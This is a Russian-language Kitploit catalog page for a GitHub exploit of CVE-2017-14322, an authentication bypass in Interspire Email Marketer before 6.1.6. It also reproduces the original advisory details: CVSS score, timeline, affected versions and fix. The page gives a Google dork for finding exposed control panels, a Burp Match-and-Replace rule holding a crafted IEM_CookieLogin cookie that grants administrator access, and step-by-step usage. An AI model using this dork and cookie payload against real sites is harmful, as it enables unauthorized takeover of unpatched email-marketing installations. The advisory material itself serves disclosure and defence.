Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-14322 — CVE-2017-14322 Interspire Email Marketer (emailmarketer) Эксплойт | Kitploit
Инструменты/GitHubGitHub/joesmithjaffa/cve-2017-14322
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubjoesmithjaffa/cve-2017-14322

CVE-2017-14322

CVE-2017-14322 Interspire Email Marketer (emailmarketer) Эксплойт

Репозиторий
518 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт CVE-2017-14322 для Interspire Email Marketer (emailmarketer)

Google Dork

root@kitploit:~
intitle:"Control Panel" + emailmarketer

Эксплуатация с помощью Burp Suit

Добавьте Match and Replace для заголовка запроса, как показано ниже:

root@kitploit:~
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D

Когда вы открываете сайт, первый раз он не сработает, так как заголовок Cookie отсутствует. Обновите сайт второй раз, используя прокси Burp с добавленным выше правилом, и вы увидите то, что хотели. Убедитесь, что отмечена опция «Intercept Client Requests»

Название:

Interspire Email Marketer - Обход удаленной аутентификации администратора

Автор:

Hakan Küsne, Infoteam Security (CH)

CVE-ID:

CVE-2017-14322

Информация о риске:

CVSS Base Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O

Хронология:

2017-09-12 Уязвимость обнаружена 2017-09-12 Обнаружено, что разработчик уже исправил это, но никогда не сообщал клиентам, оставив сотни уязвимыми в дикой природе 2017-10-17 Публичное раскрытие

Затронутые продукты:

Interspire Email Marketer до версии 6.1.6

Домашняя страница разработчика:

http://www.interspire.com/emailmarketer/

Подробности:

Функция, отвечающая за проверку, авторизован ли уже пользователь, в файле init.php в Interspire Email Marketer (IEM) до версии 6.1.6 позволяет удаленным злоумышленникам обойти аутентификацию и получить административный доступ с помощью файла cookie IEM_CookieLogin со специально подобранным значением. Вдобавок, если у клиента нет ежегодного плана обслуживания, приложение сообщает, что оно находится на последней доступной версии и обновлений нет.

Уязвимости были обнаружены во время реагирования на инцидент на скомпрометированном экземпляре приложения.

Доказательство концепции:

Подробности предоставлены здесь: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html

Исправление:

Разработчик исправил уязвимость в версии 6.1.6, но никогда не сообщал об этом своим клиентам конкретно.

Примечание:

Этот эксплойт предназначен только для образовательных целей и не несет ответственности за ваши собственные действия.

Скачать инструмент